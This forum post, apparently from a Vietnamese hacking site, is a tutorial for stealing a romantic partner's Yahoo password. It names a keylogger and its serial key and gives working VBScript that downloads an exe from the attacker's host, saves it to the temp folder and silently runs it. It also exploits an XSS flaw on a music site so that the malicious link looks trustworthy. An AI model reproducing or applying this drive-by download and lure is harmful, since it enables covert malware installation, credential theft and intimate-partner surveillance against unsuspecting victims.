• Downloading from our site will require you to have a paid membership. Upgrade to a Premium Membership from 10$ a month today!

    Dont forget read our Rules! Also anyone caught Sharing this content will be banned. By using this site you are agreeing to our rules so read them. Saying I did not know is simply not an excuse! You have been warned.

Share tut hack pass yahoo người yêu vip

Admin

Well-Known Member
Staff member
Administrator
tut này không có gì là đặc biệt ngoài lừa người yêu or gà click vào link chứa keylogger của mình, vậy làm sao để cái link ấy nhìn là thấy tin tưởng +1 chút chém gió là có thể lừa được victim, đa số là gà
thui bắt đầu
1. cài đặt 1 em bé kiếm lấy 1 cái host up em bé đó lên
download em bé
Code:
đây
the_lighthouse
serial : SBTY-SOQO-OASV-GFNE
2.nếu ai có soft mã hóa em bé này lại thì càng tốt
3.dùng script này để chạy em bé lên save lại thành embe.js dùng
Code:
HTML:
<script type="text/javascript" src="embe.js"></script>
Code:
HTML:
<script language="VBScript">
on error resume next
dl = "http://tênsite/embe.exe"
Set df = document.createElement("object")
df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
str="Microsoft.XMLHTTP"
Set x = df.CreateObject(str,"")
a1="Ado"
a2="db."
a3="Str"
a4="eam"
str1=a1&a2&a3&a4
str5=str1
set S = df.createobject(str5,"")
S.type = 1
str6="GET"
x.Open str6, dl, False
x.Send
fname1="vnhack.us"
set F = df.createobject("Scripting.FileSystemObject","")
set tmp = F.GetSpecialFolder(2)
fname1= F.BuildPath(tmp,fname1)
S.open
S.write x.responseBody
S.savetofile fname1,2
S.close
set Q = df.createobject("Shell.Application","")
Q.ShellExecute fname1,"","","open",0
</script>
4. bước cuối mới là bước quan trọng nè
hồi trước thấy mp3.zing.vn bị lỗi xss nên mình vào thử xem thế nào
gửi link nhạc này cho người yêu , chắc chắn người yêu sẽ không bao giờ nghi ngờ đó là virus
Code:
http://mp3.zing.vn/playlist/embe/IWAEBIUZ.html
lợi dụng lỗi này mình cho chạy về site gắn em bé của mình hehe
5.http://ha.ckers.org/xss.html <-- một ít về xss cho mọi người tham khảo , chịu khó tư duy và suy nghĩ ^:)^^:)^
Thấy hay thanks nhé, xem nàng cặp bồ không...:khakha:...
 

Facebook Comments

New posts New threads New resources

Back
Top